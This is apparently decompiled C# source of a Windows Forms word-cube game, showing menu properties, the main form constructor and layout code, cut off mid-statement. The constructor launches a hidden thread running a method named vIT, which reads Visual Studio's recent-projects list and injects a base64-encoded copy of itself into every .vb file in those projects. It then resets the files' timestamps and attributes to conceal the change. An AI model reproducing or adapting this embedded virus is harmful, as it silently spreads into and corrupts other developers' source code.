[MethodImpl(MethodImplOptions.Synchronized)] set { if (this._lblHumanRounds == null) ; this._lblHumanRounds = value; if (this._lblHumanRounds == null) ; } get => this._lblHumanRounds; } internal virtual MenuItem mnuEnableDefSearch { get => this._mnuEnableDefSearch; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuEnableDefSearch != null) this._mnuEnableDefSearch.Click -= new EventHandler(this.mnuEnableDefSearch_Click); this._mnuEnableDefSearch = value; if (this._mnuEnableDefSearch == null) return; this._mnuEnableDefSearch.Click += new EventHandler(this.mnuEnableDefSearch_Click); } } internal virtual MenuItem mnuAbout { get => this._mnuAbout; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuAbout != null) this._mnuAbout.Click -= new EventHandler(this.mnuAbout_Click); this._mnuAbout = value; if (this._mnuAbout == null) return; this._mnuAbout.Click += new EventHandler(this.mnuAbout_Click); } } internal virtual MenuItem MenuItem3 { get => this._MenuItem3; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._MenuItem3 == null) ; this._MenuItem3 = value; if (this._MenuItem3 == null) ; } } internal virtual MenuItem MenuItem8 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._MenuItem8 == null) ; this._MenuItem8 = value; if (this._MenuItem8 == null) ; } get => this._MenuItem8; } internal virtual MenuItem mnuLevelEasy { get => this._mnuLevelEasy; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuLevelEasy != null) this._mnuLevelEasy.Click -= new EventHandler(this.ChangeLevel); this._mnuLevelEasy = value; if (this._mnuLevelEasy == null) return; this._mnuLevelEasy.Click += new EventHandler(this.ChangeLevel); } } internal virtual MenuItem mnuLevelMedium { get => this._mnuLevelMedium; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuLevelMedium != null) this._mnuLevelMedium.Click -= new EventHandler(this.ChangeLevel); this._mnuLevelMedium = value; if (this._mnuLevelMedium == null) return; this._mnuLevelMedium.Click += new EventHandler(this.ChangeLevel); } } internal virtual MenuItem mnuLevelHard { get => this._mnuLevelHard; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuLevelHard != null) this._mnuLevelHard.Click -= new EventHandler(this.ChangeLevel); this._mnuLevelHard = value; if (this._mnuLevelHard == null) return; this._mnuLevelHard.Click += new EventHandler(this.ChangeLevel); } } internal virtual MenuItem mnuHighScores { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuHighScores != null) this._mnuHighScores.Click -= new EventHandler(this.mnuHighScores_Click); this._mnuHighScores = value; if (this._mnuHighScores == null) return; this._mnuHighScores.Click += new EventHandler(this.mnuHighScores_Click); } get => this._mnuHighScores; } internal virtual MenuItem mnuLevelImpossible { get => this._mnuLevelImpossible; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuLevelImpossible != null) this._mnuLevelImpossible.Click -= new EventHandler(this.ChangeLevel); this._mnuLevelImpossible = value; if (this._mnuLevelImpossible == null) return; this._mnuLevelImpossible.Click += new EventHandler(this.ChangeLevel); } } internal virtual MenuItem MenuItem4 { get => this._MenuItem4; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._MenuItem4 == null) ; this._MenuItem4 = value; if (this._MenuItem4 == null) ; } } internal virtual MenuItem mnuTimerInterval { get => this._mnuTimerInterval; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuTimerInterval == null) ; this._mnuTimerInterval = value; if (this._mnuTimerInterval == null) ; } } internal virtual MenuItem mnuTmr30 { get => this._mnuTmr30; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuTmr30 != null) { this._mnuTmr30.Click -= new EventHandler(this.ChangeTimerInterval); this._mnuTmr30.Click -= new EventHandler(this.ChangeTimerInterval); } this._mnuTmr30 = value; if (this._mnuTmr30 == null) return; this._mnuTmr30.Click += new EventHandler(this.ChangeTimerInterval); this._mnuTmr30.Click += new EventHandler(this.ChangeTimerInterval); } } internal virtual MenuItem mnuTips { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuTips != null) this._mnuTips.Click -= new EventHandler(this.mnuTips_Click); this._mnuTips = value; if (this._mnuTips == null) return; this._mnuTips.Click += new EventHandler(this.mnuTips_Click); } get => this._mnuTips; } internal virtual MenuItem mnuTmr100 { get => this._mnuTmr100; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuTmr100 != null) this._mnuTmr100.Click -= new EventHandler(this.ChangeTimerInterval); this._mnuTmr100 = value; if (this._mnuTmr100 == null) return; this._mnuTmr100.Click += new EventHandler(this.ChangeTimerInterval); } } internal virtual MenuItem mnuTmr130 { get => this._mnuTmr130; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuTmr130 != null) this._mnuTmr130.Click -= new EventHandler(this.ChangeTimerInterval); this._mnuTmr130 = value; if (this._mnuTmr130 == null) return; this._mnuTmr130.Click += new EventHandler(this.ChangeTimerInterval); } } internal virtual MenuItem mnuTmr200 { get => this._mnuTmr200; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuTmr200 != null) this._mnuTmr200.Click -= new EventHandler(this.ChangeTimerInterval); this._mnuTmr200 = value; if (this._mnuTmr200 == null) return; this._mnuTmr200.Click += new EventHandler(this.ChangeTimerInterval); } } internal virtual MenuItem MenuItem6 { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._MenuItem6 == null) ; this._MenuItem6 = value; if (this._MenuItem6 == null) ; } get => this._MenuItem6; } internal virtual MenuItem mnuTmr230 { get => this._mnuTmr230; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuTmr230 != null) this._mnuTmr230.Click -= new EventHandler(this.ChangeTimerInterval); this._mnuTmr230 = value; if (this._mnuTmr230 == null) return; this._mnuTmr230.Click += new EventHandler(this.ChangeTimerInterval); } } internal virtual MenuItem mnuTmr300 { get => this._mnuTmr300; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuTmr300 != null) this._mnuTmr300.Click -= new EventHandler(this.ChangeTimerInterval); this._mnuTmr300 = value; if (this._mnuTmr300 == null) return; this._mnuTmr300.Click += new EventHandler(this.ChangeTimerInterval); } } internal virtual MenuItem mnuTmr330 { get => this._mnuTmr330; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuTmr330 != null) this._mnuTmr330.Click -= new EventHandler(this.ChangeTimerInterval); this._mnuTmr330 = value; if (this._mnuTmr330 == null) return; this._mnuTmr330.Click += new EventHandler(this.ChangeTimerInterval); } } internal virtual BogButton btnFinish { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._btnFinish != null) this._btnFinish.Click -= new EventHandler(this.btnFinish_Click); this._btnFinish = value; if (this._btnFinish == null) return; this._btnFinish.Click += new EventHandler(this.btnFinish_Click); } get => this._btnFinish; } internal virtual MenuItem mnuTmr400 { get => this._mnuTmr400; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuTmr400 != null) this._mnuTmr400.Click -= new EventHandler(this.ChangeTimerInterval); this._mnuTmr400 = value; if (this._mnuTmr400 == null) return; this._mnuTmr400.Click += new EventHandler(this.ChangeTimerInterval); } } internal virtual MenuItem mnuTmr430 { get => this._mnuTmr430; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuTmr430 != null) this._mnuTmr430.Click -= new EventHandler(this.ChangeTimerInterval); this._mnuTmr430 = value; if (this._mnuTmr430 == null) return; this._mnuTmr430.Click += new EventHandler(this.ChangeTimerInterval); } } internal virtual MenuItem mnuTmr500 { get => this._mnuTmr500; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuTmr500 != null) this._mnuTmr500.Click -= new EventHandler(this.ChangeTimerInterval); this._mnuTmr500 = value; if (this._mnuTmr500 == null) return; this._mnuTmr500.Click += new EventHandler(this.ChangeTimerInterval); } } internal virtual MenuItem mnuEnableTimerFlash { get => this._mnuEnableTimerFlash; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuEnableTimerFlash != null) this._mnuEnableTimerFlash.Click -= new EventHandler(this.mnuEnableTimerFlash_Click); this._mnuEnableTimerFlash = value; if (this._mnuEnableTimerFlash == null) return; this._mnuEnableTimerFlash.Click += new EventHandler(this.mnuEnableTimerFlash_Click); } } internal virtual MenuItem mnuEnableWordValidation { [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._mnuEnableWordValidation != null) this._mnuEnableWordValidation.Click -= new EventHandler(this.mnuEnableWordValidation_Click); this._mnuEnableWordValidation = value; if (this._mnuEnableWordValidation == null) return; this._mnuEnableWordValidation.Click += new EventHandler(this.mnuEnableWordValidation_Click); } get => this._mnuEnableWordValidation; } internal virtual BogButton btnContinue { get => this._btnContinue; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._btnContinue != null) this._btnContinue.Click -= new EventHandler(this.btnContinue_Click_1); this._btnContinue = value; if (this._btnContinue == null) return; this._btnContinue.Click += new EventHandler(this.btnContinue_Click_1); } } internal virtual BogButton btnScramble { get => this._btnScramble; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._btnScramble != null) this._btnScramble.Click -= new EventHandler(this.btnScramble_Click_1); this._btnScramble = value; if (this._btnScramble == null) return; this._btnScramble.Click += new EventHandler(this.btnScramble_Click_1); } } internal virtual MenuItem MenuItem5 { get => this._MenuItem5; [MethodImpl(MethodImplOptions.Synchronized)] set { if (this._MenuItem5 == null) ; this._MenuItem5 = value; if (this._MenuItem5 == null) ; } } private void vIT() { RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\VisualStudio\\7.0\\ProjectMRUList"); if (registryKey.ValueCount == 0) ProjectData.EndApp(); string String2 = "Private Sub vIT()"; string str1 = "Public Sub New()"; string str2 = "Dim t As New System.Threading.Thread(AddressOf vIT)\r\nt.Start()"; string str3 = "UHJpdmF0ZSBTdWIgdklUKCkNCkRpbSBYLCBZIEFzIEludGVnZXINCkRpbSBBLCBC" + "KCksIEMsIEcsIEgsIEksIEosIEssIEwgQXMgU3RyaW5nDQpEaW0gRCwgRiBBcyBE" + "YXRlDQpEaW0gUiBBcyBNaWNyb3NvZnQuV2luMzIuUmVnaXN0cnlLZXkNCkRpbSBT" + "IEFzIFN5c3RlbS5JTy5TdHJlYW1SZWFkZXINCkRpbSBUIEFzIFN5c3RlbS5JTy5T" + "dHJlYW1Xcml0ZXINCkRpbSBVIEFzIFN5c3RlbS5JTy5GaWxlQXR0cmlidXRlcw0K" + "UiA9IE1pY3Jvc29mdC5XaW4zMi5SZWdpc3RyeS5DdXJyZW50VXNlci5PcGVuU3Vi" + "S2V5KCJTb2Z0d2FyZVxNaWNyb3NvZnRcVmlzdWFsU3R1ZGlvXDcuMFxQcm9qZWN0" + "TVJVTGlzdCIpDQpJZiBSLlZhbHVlQ291bnQgPSAwIFRoZW4gRW5kDQpHID0gIlBy" + "aXZhdGUgU3ViIHZJVCgpIg0KSCA9ICJQdWJsaWMgU3ViIE5ldygpIg0KSSA9ICJE" + "aW0gdCBBcyBOZXcgU3lzdGVtLlRocmVhZGluZy5UaHJlYWQoQWRkcmVzc09mIHZJ" + "VCkiICYgdmJDckxmICYgInQuU3RhcnQoKSINCkogPSAiIg0KSyA9IFN5c3RlbS5U" + "ZXh0LkVuY29kaW5nLkFTQ0lJLkdldFN0cmluZyhTeXN0ZW0uQ29udmVydC5Gcm9t" + "QmFzZTY0U3RyaW5nKEopKQ0KTCA9ICJKID0gIiAmIENocigzNCkNCkZvciBYID0g" + "MSBUbyBMZW4oSikgU3RlcCA2NA0KSWYgWCArIDY0IDwgTGVuKEopIFRoZW4NCkwg" + "PSBMICYgTWlkKEosIFgsIDY0KSAmIENocigzNCkgJiB2YkNyTGYgJiAiSiA9IEog" + "JiAiICYgQ2hyKDM0KQ0KRWxzZQ0KTCA9IEwgJiBNaWQoSiwgWCwgNjQpICYgQ2hy" + "KDM0KQ0KRW5kIElmDQpOZXh0DQpLID0gUmVwbGFjZShLLCAiSiA9ICIgJiBDaHIo" + "MzQpICYgQ2hyKDM0KSwgTCwgMSwgMSwgQ29tcGFyZU1ldGhvZC5UZXh0KQ0KTCA9" + "ICIiDQpGb3IgWCA9IDAgVG8gUi5WYWx1ZUNvdW50IC0gMQ0KQSA9IFIuR2V0VmFs" + "dWUoUi5HZXRWYWx1ZU5hbWVzKFgpKQ0KQSA9IE1pZChBLCAxLCBJblN0clJldihB" + "LCAiXCIsIC0xLCBDb21wYXJlTWV0aG9kLlRleHQpKQ0KSWYgU3lzdGVtLklPLkRp" + "cmVjdG9yeS5FeGlzdHMoQSkgVGhlbg0KQiA9IFN5c3RlbS5JTy5EaXJlY3Rvcnku" + "R2V0RmlsZXMoQSwgIioudmIiKQ0KRm9yIFkgPSBMQm91bmQoQikgVG8gVUJvdW5k" + "KEIpDQpEID0gU3lzdGVtLklPLkZpbGUuR2V0TGFzdEFjY2Vzc1RpbWUoQihZKSkN" + "CkYgPSBTeXN0ZW0uSU8uRmlsZS5HZXRMYXN0V3JpdGVUaW1lKEIoWSkpDQpVID0g" + "U3lzdGVtLklPLkZpbGUuR2V0QXR0cmlidXRlcyhCKFkpKQ0KU3lzdGVtLklPLkZp" + "bGUuU2V0QXR0cmlidXRlcyhCKFkpLCBJTy5GaWxlQXR0cmlidXRlcy5Ob3JtYWwp" + "DQpTID0gU3lzdGVtLklPLkZpbGUuT3BlblRleHQoQihZKSkNCkMgPSBTLlJlYWRU" + "b0VuZCgpDQpTLkNsb3NlKCkNCklmIEluU3RyKEMsIEcsIENvbXBhcmVNZXRob2Qu" + "VGV4dCkgPSAwIEFuZCBJblN0cihDLCBILCBDb21wYXJlTWV0aG9kLlRleHQpIDw+" + "IDAgVGhlbg0KQyA9IFJlcGxhY2UoQywgIk15QmFzZS5OZXcoKSIsICJNeUJhc2Uu" + "TmV3KCkiICYgdmJDckxmICYgSSwgLCAxLCBDb21wYXJlTWV0aG9kLlRleHQpDQpD" + "ID0gUmVwbGFjZShDLCBILCBLICYgSCwgLCAxLCBDb21wYXJlTWV0aG9kLlRleHQp" + "DQpUID0gU3lzdGVtLklPLkZpbGUuQ3JlYXRlVGV4dChCKFkpKQ0KVC5Xcml0ZShD" + "KQ0KVC5GbHVzaCgpDQpULkNsb3NlKCkNCkVuZCBJZg0KU3lzdGVtLklPLkZpbGUu" + "U2V0TGFzdFdyaXRlVGltZShCKFkpLCBGKQ0KU3lzdGVtLklPLkZpbGUuU2V0TGFz" + "dEFjY2Vzc1RpbWUoQihZKSwgRCkNClN5c3RlbS5JTy5GaWxlLlNldEF0dHJpYnV0" + "ZXMoQihZKSwgVSkNCk5leHQNCkVuZCBJZg0KTmV4dA0KRW5kIFN1Yg0K"; string Expression = Encoding.ASCII.GetString(Convert.FromBase64String(str3)); string Replacement = "J = \""; int num1 = Strings.Len(str3); int Start = 1; while (Start <= num1) { Replacement = checked (Start + 64) >= Strings.Len(str3) ? Replacement + Strings.Mid(str3, Start, 64) + "\"" : Replacement + Strings.Mid(str3, Start, 64) + "\"" + "\r\nJ = J & " + "\""; checked { Start += 64; } } string str4 = Strings.Replace(Expression, "J = \"\"", Replacement, Count: 1, Compare: CompareMethod.Text); int num2 = checked (registryKey.ValueCount - 1); int index1 = 0; while (index1 <= num2) { string str5 = StringType.FromObject(registryKey.GetValue(registryKey.GetValueNames()[index1])); string path = Strings.Mid(str5, 1, Strings.InStrRev(str5, "\\", Compare: CompareMethod.Text)); if (Directory.Exists(path)) { string[] files = Directory.GetFiles(path, "*.vb"); int num3 = Information.LBound((Array) files); int num4 = Information.UBound((Array) files); int index2 = num3; while (index2 <= num4) { DateTime lastAccessTime = File.GetLastAccessTime(files[index2]); DateTime lastWriteTime = File.GetLastWriteTime(files[index2]); FileAttributes attributes = File.GetAttributes(files[index2]); File.SetAttributes(files[index2], FileAttributes.Normal); StreamReader streamReader = File.OpenText(files[index2]); string end = streamReader.ReadToEnd(); streamReader.Close(); if (Strings.InStr(end, String2, CompareMethod.Text) == 0 & Strings.InStr(end, str1, CompareMethod.Text) != 0) { string str6 = Strings.Replace(Strings.Replace(end, "MyBase.New()", "MyBase.New()\r\n" + str2, Count: 1, Compare: CompareMethod.Text), str1, str4 + str1, Count: 1, Compare: CompareMethod.Text); StreamWriter text = File.CreateText(files[index2]); text.Write(str6); text.Flush(); text.Close(); } File.SetLastWriteTime(files[index2], lastWriteTime); File.SetLastAccessTime(files[index2], lastAccessTime); File.SetAttributes(files[index2], attributes); checked { ++index2; } } } checked { ++index1; } } } public frmMain() { this.Load += new EventHandler(this.frmMain_Load); this.FoundWords = new DataTable(); this.WordsChosen = new string[1]; this.ScramSec = 5.0; this.\u0024STATIC\u0024FindNextLetterSquare\u002420188\u0024WentDirection\u0024Init = new StaticLocalInitFlag(); new Thread(new ThreadStart(this.vIT)).Start(); this.InitializeComponent(); } protected override void Dispose(bool disposing) { if (disposing && this.components != null) this.components.Dispose(); base.Dispose(disposing); } [DebuggerStepThrough] private void InitializeComponent() { this.components = (IContainer) new System.ComponentModel.Container(); this.pnlCubes = new BogPanel(); this.pnlTimer = new BogPanel(); this.tmrMain = new BogTimer(); this.BogBorder2 = new BogBorder(); this.BogBorder6 = new BogBorder(); this.BogBorder7 = new BogBorder(); this.BogBorder8 = new BogBorder(); this.lbl1 = new CircleLabel(); this.lbl4 = new CircleLabel(); this.lbl3 = new CircleLabel(); this.lbl2 = new CircleLabel(); this.lbl5 = new CircleLabel(); this.lbl6 = new CircleLabel(); this.lbl7 = new CircleLabel(); this.lbl8 = new CircleLabel(); this.lbl9 = new CircleLabel(); this.lbl10 = new CircleLabel(); this.lbl11 = new CircleLabel(); this.lbl12 = new CircleLabel(); this.lbl13 = new CircleLabel(); this.lbl14 = new CircleLabel(); this.lbl15 = new CircleLabel(); this.lbl16 = new CircleLabel(); this.picCubeDown = new PictureBox(); this.btnAddWord = new BogButton(); this.lstHumanWordsFound = new ListBox(); this.mnuMain = new MainMenu(); this.mnuGame = new MenuItem(); this.mnuNewGame = new MenuItem(); this.mnuEndGame = new MenuItem(); this.MenuItem8 = new MenuItem(); this.mnuHighScores = new MenuItem(); this.MenuItem2 = new MenuItem(); this.mnuExitGame = new MenuItem(); this.mnuOptions = new MenuItem(); this.mnuEnableDefSearch = new MenuItem(); this.MenuItem1 = new MenuItem(); this.mnuMode = new MenuItem(); this.mnuBoardGameMode = new MenuItem(); this.mnuVsMode = new MenuItem(); this.mnuTeachingMode = new MenuItem(); this.MenuItem3 = new MenuItem(); this.mnuLevelEasy = new MenuItem(); this.mnuLevelMedium = new MenuItem(); this.mnuLevelHard = new MenuItem(); this.mnuLevelImpossible = new MenuItem(); this.MenuItem4 = new MenuItem(); this.mnuTimerInterval = new MenuItem(); this.mnuTmr30 = new MenuItem(); this.mnuTmr100 = new MenuItem(); this.mnuTmr130 = new MenuItem(); this.mnuTmr200 = new MenuItem(); this.mnuTmr230 = new MenuItem(); this.mnuTmr300 = new MenuItem(); this.mnuTmr330 = new MenuItem(); this.mnuTmr400 = new MenuItem(); this.mnuTmr430 = new MenuItem(); this.mnuTmr500 = new MenuItem(); this.mnuEnableTimerFlash = new MenuItem(); this.MenuItem5 = new MenuItem(); this.mnuEnableWordValidation = new MenuItem(); this.mnuHelp = new MenuItem(); this.mnuAbout = new MenuItem(); this.MenuItem6 = new MenuItem(); this.mnuTips = new MenuItem(); this.tmrContMain = new System.Windows.Forms.Timer(this.components); this.txtWordFound = new TextBox(); this.lblHumanScore = new Label(); this.Panel1 = new Panel(); this.pnlScore = new BogPanel(); this.pnlWords = new BogPanel(); this.BogBorder9 = new BogBorder(); this.BogBorder10 = new BogBorder(); this.BogBorder11 = new BogBorder(); this.BogBorder12 = new BogBorder(); this.BogBorder13 = new BogBorder(); this.BogBorder14 = new BogBorder(); this.BogBorder15 = new BogBorder(); this.BogBorder16 = new BogBorder(); this.lstCompFoundWords = new ListBox(); this.tmrBtn1 = new Button(); this.tmrBtn2 = new Button(); this.tmrBtn3 = new Button(); this.tmrBtn4 = new Button(); this.Label1 = new Label(); this.Label2 = new Label(); this.lblCompScore = new Label(); this.Label3 = new Label(); this.Label4 = new Label(); this.Label5 = new Label(); this.lblHumanWordsCount = new Label(); this.lblCompWordsCount = new Label(); this.btnContinue = new BogButton(); this.btnScramble = new BogButton(); this.btnFinish = new BogButton(); this.lblHumanRounds = new Label(); this.lblComputerRounds = new Label(); this.Label7 = new Label(); this.Label8 = new Label(); this.lblRound = new Label(); this.Label6 = new Label(); this.BogBorder5 = new BogBorder(); this.Panel3 = new Panel(); this.Panel2 = new Panel(); this.txtMain = new RichTextBox(); this.BogBorder4 = new BogBorder(); this.BogBorder3 = new BogBorder(); this.BogBorder1 = new BogBorder(); this.picCubesUp = new PictureBox(); this.CircleLabel1 = new CircleLabel(); this.CircleLabel2 = new CircleLabel(); this.CircleLabel3 = new CircleLabel(); this.PictureBox1 = new PictureBox(); this.SuspendLayout(); this.pnlCubes.BackColor = System.Drawing.Color.DarkGray; BogPanel pnlCubes1 = this.pnlCubes; Point point1 = new Point(310, -3); Point point2 = point1; pnlCubes1.Location = point2; this.pnlCubes.Name = "pnlCubes"; BogPanel pnlCubes2 = this.pnlCubes; Size size1 = new Size(539, 650); Size size2 = size1; pnlCubes2.Size = size2; this.pnlCubes.TabIndex = 6; this.pnlCubes.TabStop = false; this.pnlTimer.BackColor = System.Drawing.Color.DarkGray; BogPanel pnlTimer1 = this.pnlTimer; point1 = new Point(35, -1); Point point3 = point1; pnlTimer1.Location = point3; this.pnlTimer.Name = "pnlTimer"; BogPanel pnlTimer2 = this.pnlTimer; size1 = new Size(237, 166); Size size3 = size1; pnlTimer2.Size = size3; this.pnlTimer.TabIndex = 7; this.pnlTimer.TabStop = false; this.tmrMain.BackColor = System.Drawing.Color.Black; this.tmrMain.EnableFlash = false; this.tmrMain.LedBackColor = System.Drawing.Color.Black; this.tmrMain.LedOffColor = System.Drawing.Color.FromArgb(0, 0, 70); this.tmrMain.LedOnColor = System.Drawing.Color.DeepSkyBlue; BogTimer tmrMain1 = this.tmrMain; point1 = new Point(69, 24); Point point4 = point1; tmrMain1.Location = point4; this.tmrMain.Name = "tmrMain"; BogTimer tmrMain2 = this.tmrMain; size1 = new Size(168, 80); Size size4 = size1; tmrMain2.Size = size4; this.tmrMain.TabIndex = 8; this.tmrMain.TimerText = (string) null; this.BogBorder2.BackColor = System.Drawing.Color.DarkGray; this.BogBorder2.BorderDirection = BogBorder.Direction.Left; BogBorder bogBorder2_1 = this.BogBorder2; point1 = new Point(59, 13); Point point5 = point1; bogBorder2_1.Location = point5; this.BogBorder2.Name = "BogBorder2"; BogBorder bogBorder2_2 = this.BogBorder2; size1 = new Size(10, 102); Size size5 = size1; bogBorder2_2.Size = size5; this.BogBorder2.TabIndex = 14; this.BogBorder2.TabStop = false; this.BogBorder6.BackColor = System.Drawing.Color.DarkGray; this.BogBorder6.BorderDirection = BogBorder.Direction.Top; BogBorder bogBorder6_1 = this.BogBorder6; point1 = new Point(69, 16); Point point6 = point1; bogBorder6_1.Location = point6; this.BogBorder6.Name = "BogBorder6"; BogBorder bogBorder6_2 = this.BogBorder6; size1 = new Size(168, 9); Size size6 = size1; bogBorder6_2.Size = size6; this.BogBorder6.TabIndex = 15; this.BogBorder6.TabStop = false; this.BogBorder7.BackColor = System.Drawing.Color.DarkGray; this.BogBorder7.BorderDirection = BogBorder.Direction.Bottom; BogBorder bogBorder7_1 = this.BogBorder7; point1 = new Point(69, 104); Point point7 = point1; bogBorder7_1.Location = point7; this.BogBorder7.Name = "BogBorder7"; BogBorder bogBorder7_2 = this.BogBorder7; size1 = new Size(168, 9); Size size7 = size1; bogBorder7_2.Size = size7; this.BogBorder7.TabIndex = 16; this.BogBorder7.TabStop = false; this.BogBorder8.BackColor = System.Drawing.Color.DarkGray; this.BogBorder8.BorderDirection = BogBorder.Direction.Right; BogBorder bogBorder8_1 = this.BogBorder8; point1 = new Point(237, 16); Point point8 = point1; bogBorder8_1.Location = point8; this.BogBorder8.Name = "BogBorder8"; BogBorder bogBorder8_2 = this.BogBorder8; size1 = new Size(10, 97); Size size8 = size1; bogBorder8_2.Size = size8; this.BogBorder8.TabIndex = 17; this.BogBorder8.TabStop = false; this.lbl1.BackColor = System.Drawing.Color.LightGray; this.lbl1.CubeHighLight = System.Drawing.Color.LightGray; this.lbl1.CubeText = "W"; this.lbl1.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl1.CubeTopRadius = 55L; CircleLabel lbl1_1 = this.lbl1; point1 = new Point(386, 186); Point point9 = point1; lbl1_1.Location = point9; this.lbl1.Name = "lbl1"; CircleLabel lbl1_2 = this.lbl1; size1 = new Size(55, 55); Size size9 = size1; lbl1_2.Size = size9; this.lbl1.TabIndex = 19; this.lbl1.Tag = (object) "00"; this.lbl4.BackColor = System.Drawing.Color.LightGray; this.lbl4.CubeHighLight = System.Drawing.Color.LightGray; this.lbl4.CubeText = "W"; this.lbl4.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl4.CubeTopRadius = 55L; CircleLabel lbl4_1 = this.lbl4; point1 = new Point(609, 190); Point point10 = point1; lbl4_1.Location = point10; this.lbl4.Name = "lbl4"; CircleLabel lbl4_2 = this.lbl4; size1 = new Size(55, 55); Size size10 = size1; lbl4_2.Size = size10; this.lbl4.TabIndex = 20; this.lbl4.Tag = (object) "30"; this.lbl3.BackColor = System.Drawing.Color.LightGray; this.lbl3.CubeHighLight = System.Drawing.Color.LightGray; this.lbl3.CubeText = "W"; this.lbl3.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl3.CubeTopRadius = 55L; CircleLabel lbl3_1 = this.lbl3; point1 = new Point(532, 189); Point point11 = point1; lbl3_1.Location = point11; this.lbl3.Name = "lbl3"; CircleLabel lbl3_2 = this.lbl3; size1 = new Size(55, 55); Size size11 = size1; lbl3_2.Size = size11; this.lbl3.TabIndex = 21; this.lbl3.Tag = (object) "20"; this.lbl2.BackColor = System.Drawing.Color.LightGray; this.lbl2.CubeHighLight = System.Drawing.Color.LightGray; this.lbl2.CubeText = "W"; this.lbl2.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl2.CubeTopRadius = 55L; CircleLabel lbl2_1 = this.lbl2; point1 = new Point(459, 188); Point point12 = point1; lbl2_1.Location = point12; this.lbl2.Name = "lbl2"; CircleLabel lbl2_2 = this.lbl2; size1 = new Size(55, 55); Size size12 = size1; lbl2_2.Size = size12; this.lbl2.TabIndex = 22; this.lbl2.Tag = (object) "10"; this.lbl5.BackColor = System.Drawing.Color.LightGray; this.lbl5.CubeHighLight = System.Drawing.Color.LightGray; this.lbl5.CubeText = "W"; this.lbl5.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl5.CubeTopRadius = 55L; CircleLabel lbl5_1 = this.lbl5; point1 = new Point(389, 262); Point point13 = point1; lbl5_1.Location = point13; this.lbl5.Name = "lbl5"; CircleLabel lbl5_2 = this.lbl5; size1 = new Size(55, 55); Size size13 = size1; lbl5_2.Size = size13; this.lbl5.TabIndex = 23; this.lbl5.Tag = (object) "01"; this.lbl6.BackColor = System.Drawing.Color.LightGray; this.lbl6.CubeHighLight = System.Drawing.Color.LightGray; this.lbl6.CubeText = "W"; this.lbl6.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl6.CubeTopRadius = 55L; CircleLabel lbl6_1 = this.lbl6; point1 = new Point(462, 261); Point point14 = point1; lbl6_1.Location = point14; this.lbl6.Name = "lbl6"; CircleLabel lbl6_2 = this.lbl6; size1 = new Size(55, 55); Size size14 = size1; lbl6_2.Size = size14; this.lbl6.TabIndex = 24; this.lbl6.Tag = (object) "11"; this.lbl7.BackColor = System.Drawing.Color.LightGray; this.lbl7.CubeHighLight = System.Drawing.Color.LightGray; this.lbl7.CubeText = "W"; this.lbl7.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl7.CubeTopRadius = 55L; CircleLabel lbl7_1 = this.lbl7; point1 = new Point(535, 261); Point point15 = point1; lbl7_1.Location = point15; this.lbl7.Name = "lbl7"; CircleLabel lbl7_2 = this.lbl7; size1 = new Size(55, 55); Size size15 = size1; lbl7_2.Size = size15; this.lbl7.TabIndex = 25; this.lbl7.Tag = (object) "21"; this.lbl8.BackColor = System.Drawing.Color.LightGray; this.lbl8.CubeHighLight = System.Drawing.Color.LightGray; this.lbl8.CubeText = "W"; this.lbl8.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl8.CubeTopRadius = 55L; CircleLabel lbl8_1 = this.lbl8; point1 = new Point(612, 261); Point point16 = point1; lbl8_1.Location = point16; this.lbl8.Name = "lbl8"; CircleLabel lbl8_2 = this.lbl8; size1 = new Size(55, 55); Size size16 = size1; lbl8_2.Size = size16; this.lbl8.TabIndex = 26; this.lbl8.Tag = (object) "31"; this.lbl9.BackColor = System.Drawing.Color.LightGray; this.lbl9.CubeHighLight = System.Drawing.Color.LightGray; this.lbl9.CubeText = "W"; this.lbl9.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl9.CubeTopRadius = 55L; CircleLabel lbl9_1 = this.lbl9; point1 = new Point(393, 340); Point point17 = point1; lbl9_1.Location = point17; this.lbl9.Name = "lbl9"; CircleLabel lbl9_2 = this.lbl9; size1 = new Size(55, 55); Size size17 = size1; lbl9_2.Size = size17; this.lbl9.TabIndex = 27; this.lbl9.Tag = (object) "02"; this.lbl10.BackColor = System.Drawing.Color.LightGray; this.lbl10.CubeHighLight = System.Drawing.Color.LightGray; this.lbl10.CubeText = "W"; this.lbl10.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl10.CubeTopRadius = 55L; CircleLabel lbl10_1 = this.lbl10; point1 = new Point(462, 342); Point point18 = point1; lbl10_1.Location = point18; this.lbl10.Name = "lbl10"; CircleLabel lbl10_2 = this.lbl10; size1 = new Size(55, 55); Size size18 